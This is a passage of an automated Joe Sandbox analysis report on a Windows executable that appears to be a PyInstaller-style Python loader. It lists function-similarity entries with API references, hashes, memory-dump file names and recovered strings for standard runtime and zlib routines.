                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 1708b530f5072f472fe09baedec27f5756de37f3e343805e4a7815c0544b33da
                                                                                                                                                                                                                                                        • Instruction ID: 28b8ac33f547723a168077c6d6f080ef8b6c06bb91be1cefab5bea2eef375b6a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1708b530f5072f472fe09baedec27f5756de37f3e343805e4a7815c0544b33da
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60018C21E0F64280FE616B666A41279A9A0EF0C790F044734EF1DC26F6FF3CFA914248
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6ABA4C3F0
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA4CE18: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF6ABA4CE20
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA4CE18: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF6ABA4CE25
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1208906642-0
                                                                                                                                                                                                                                                        • Opcode ID: ececd82fc3177ae58a022cdb863293519d79894eaec9217f5cc72d6a823b184f
                                                                                                                                                                                                                                                        • Instruction ID: 9c1a77ff167a9c3d131166a1c38260ad8918bd901085d079ae9c6fa59f3cd0bd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ececd82fc3177ae58a022cdb863293519d79894eaec9217f5cc72d6a823b184f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3AE0B621D0F64381FFA8266116463B94640DF2D348F801474DB4DD21F3BE0E35671121
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: ca4321753697ca9e26add91f4c87d6fa1af88743aafd66e8485bee4c71de2195
                                                                                                                                                                                                                                                        • Instruction ID: df6bb99926aaf80565bae98661573000477c85125d2bbabda0032f2ff33e880e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca4321753697ca9e26add91f4c87d6fa1af88743aafd66e8485bee4c71de2195
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19E0ECB2E0A6178BF7553AE045862B81150EF1C340F54A275DB088A2E3FD2E6A85562A
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,00000000,00007FF6ABA5C22A,?,?,?,00007FF6ABA55E51,?,?,?,?,00007FF6ABA5B392), ref: 00007FF6ABA5FE59
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                                        • Opcode ID: e5baedaef9e1aefb999d7e678a491e2cb8f7af630fb86e3f47b81283e20e243b
                                                                                                                                                                                                                                                        • Instruction ID: 9f720487b2315f3f237989a9d1e5f3ec546695f0d381c27150473517a85f096a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e5baedaef9e1aefb999d7e678a491e2cb8f7af630fb86e3f47b81283e20e243b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2DF06D61B1B64785FE545AA6A9153B45290DF4DB80F0C5630CF0ECA3F2FE2DE6C14218
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF6ABA50268,?,?,?,00007FF6ABA518D2,?,?,?,?,?,00007FF6ABA54595), ref: 00007FF6ABA5E702
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                                        • Opcode ID: c4f21c11c5720e62b677d9e99b1ce174dfbed18f849e52640c9a6f6ea7657029
                                                                                                                                                                                                                                                        • Instruction ID: 8db5a930e3528bad5107190debb7b2f14a2ad295b44ff518714dad3bcbacd7b4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4f21c11c5720e62b677d9e99b1ce174dfbed18f849e52640c9a6f6ea7657029
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EAF01C51B1F24645FE686BA299152792184DF4D7A0F084730EF3ECA6E1FE2CE6908618
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6ABA4590F,00000000,00007FF6ABA4272E), ref: 00007FF6ABA44C50
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6ABA4590F,00000000,00007FF6ABA4272E), ref: 00007FF6ABA44C62
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6ABA4590F,00000000,00007FF6ABA4272E), ref: 00007FF6ABA44C99
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6ABA4590F,00000000,00007FF6ABA4272E), ref: 00007FF6ABA44CAB
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6ABA4590F,00000000,00007FF6ABA4272E), ref: 00007FF6ABA44CC4
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6ABA4590F,00000000,00007FF6ABA4272E), ref: 00007FF6ABA44CD6
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6ABA4590F,00000000,00007FF6ABA4272E), ref: 00007FF6ABA44CEF
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6ABA4590F,00000000,00007FF6ABA4272E), ref: 00007FF6ABA44D01
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6ABA4590F,00000000,00007FF6ABA4272E), ref: 00007FF6ABA44D1D
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6ABA4590F,00000000,00007FF6ABA4272E), ref: 00007FF6ABA44D2F
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6ABA4590F,00000000,00007FF6ABA4272E), ref: 00007FF6ABA44D4B
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6ABA4590F,00000000,00007FF6ABA4272E), ref: 00007FF6ABA44D5D
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6ABA4590F,00000000,00007FF6ABA4272E), ref: 00007FF6ABA44D79
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6ABA4590F,00000000,00007FF6ABA4272E), ref: 00007FF6ABA44D8B
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6ABA4590F,00000000,00007FF6ABA4272E), ref: 00007FF6ABA44DA7
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6ABA4590F,00000000,00007FF6ABA4272E), ref: 00007FF6ABA44DB9
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6ABA4590F,00000000,00007FF6ABA4272E), ref: 00007FF6ABA44DD5
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6ABA4590F,00000000,00007FF6ABA4272E), ref: 00007FF6ABA44DE7
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                        • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                        • Opcode ID: 91fe38e706475bc85e8e17d1603b2dd44d209342b91b11e5c33006422c226cfa
                                                                                                                                                                                                                                                        • Instruction ID: 484f00331de8e033213f4c2e4e2ea67218cb40a33aee0e2e8f66ca286ae5d599
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91fe38e706475bc85e8e17d1603b2dd44d209342b91b11e5c33006422c226cfa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2922AEA4D0FB0BA1FA559B69B86417423A0FF4C785F895435EA4F86274FF3CB59AC200
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                        • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                        • Opcode ID: d700f69ad9a83803b0d0e637264b1b7e22121a30603610bb88393cfb8a3bc4ed
                                                                                                                                                                                                                                                        • Instruction ID: d9f26b028890957df629ce25974e44b840346feda2553a71183701d0d8c9dcda
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d700f69ad9a83803b0d0e637264b1b7e22121a30603610bb88393cfb8a3bc4ed
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2B2D3B2E1A6868BE7258F6CD4607FD37A1FB58388F545135DB0D97A94EF38A900CB40
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                                        • API String ID: 0-2665694366
                                                                                                                                                                                                                                                        • Opcode ID: 4827148dd37d06b9a23a2cb7d22b3f776e5342dd5831b168843cb21776e0705c
                                                                                                                                                                                                                                                        • Instruction ID: 1e03cc033c465ec530d5fc8ce25ec05c482fc4eb894b576d4adfcaa4ed902430
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4827148dd37d06b9a23a2cb7d22b3f776e5342dd5831b168843cb21776e0705c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C52C472A196E58BE7948F14C558A7E3BA9FB88340F018139E74AC7790EF3DD884CB00
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3140674995-0
                                                                                                                                                                                                                                                        • Opcode ID: 89357c2c4ffda8ae13225540be7c458f51fcd4783b393db7419e501aec0a0031
                                                                                                                                                                                                                                                        • Instruction ID: 6bbb4984bc3c55c8e4d9ba4909d8044f49803b9e29df7d3f5df9fdad7fb7f2f4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89357c2c4ffda8ae13225540be7c458f51fcd4783b393db7419e501aec0a0031
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE314372606B8186EB609F65E8507ED7364FB88744F44403ADB4D87BA4FF78D558C710
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                                                                                        • Opcode ID: 2c2a6f2487acec397f330098253e2a7329acffa396285c7b3dfee245a17751bc
                                                                                                                                                                                                                                                        • Instruction ID: baacca20c378803ebd71a9cc28592a86710942b9f65e8817c04a011a45a7d430
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c2a6f2487acec397f330098253e2a7329acffa396285c7b3dfee245a17751bc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16317476609F8186DB60CF25E8502AD73A4FB88794F540136EB9D83B64EF3CC155CB00
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2227656907-0
                                                                                                                                                                                                                                                        • Opcode ID: ccac9e585c27fa031d1f88e05c20b38684cf4203d2ca8c6846fc05bcbc68a6e8
                                                                                                                                                                                                                                                        • Instruction ID: 497625fdb7fb4e79ccd218e28cb86cab66e3c9f8d5734fcc2c0cd9abf0d31e50
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ccac9e585c27fa031d1f88e05c20b38684cf4203d2ca8c6846fc05bcbc68a6e8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2BB1B7A2B1A79281EE609F2994202B9A751EB48BD4F444132DF5F87BE5FE3CE845C300
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                                        • Opcode ID: d5122b7aff0e10d146bffe79506b726acaac58846df22bdc99709fd59aa8d240
                                                                                                                                                                                                                                                        • Instruction ID: 91fecc791a5ceea50f77d13232ee515153d65363e00aa235ff2f9c210cf886ab
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d5122b7aff0e10d146bffe79506b726acaac58846df22bdc99709fd59aa8d240
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D112A62B16F019AEB00DF64E8642B833A4FB1D758F441E35DB6D86BA4EF7CD1648340
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: memcpy_s
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1502251526-0
                                                                                                                                                                                                                                                        • Opcode ID: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
                                                                                                                                                                                                                                                        • Instruction ID: de09b709649a40519a437a782aa618a03990a18a2ad5ca0d0d1335ec050437cb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2BC128B2B1A68A87EB24CF5DE05466AB791F788B84F458135DB4E83754EF3DE800CB40
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
